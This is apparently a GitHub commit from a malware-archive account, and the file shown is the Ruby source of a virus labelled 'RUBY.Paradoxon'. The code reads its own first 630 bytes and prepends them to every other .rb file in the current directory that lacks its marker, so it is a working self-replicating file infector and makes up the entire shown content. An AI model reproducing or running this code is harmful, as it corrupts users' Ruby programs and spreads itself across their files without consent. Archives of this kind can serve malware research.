Add files via upload

This commit is contained in:
vxunderground
2020-10-09 22:09:52 -05:00
committed by GitHub
parent f5ec68af9b
commit 9cbdb38457
17 changed files with 2998 additions and 0 deletions
+26
View File
@@ -0,0 +1,26 @@
# RUBY.Paradoxon
mycode=File.open(__FILE__).read(630)
cdir = Dir.open(Dir.getwd)
cdir.each do |a|
if File.ftype(a)=="file" then
if a[a.length-3, a.length]==".rb" then
if a!=File.basename(__FILE__) then
fcode=""
fle=open(a)
spth=fle.read(1)
while spth!=nil
fcode+=spth
spth=fle.read(1)
end
fle.close
if fcode[7,9]!="Paradoxon" then
fcode=mycode+13.chr+10.chr+fcode
fle=open(a,"w")
fle.print fcode
fle.close
end
end
end
end
end
cdir.close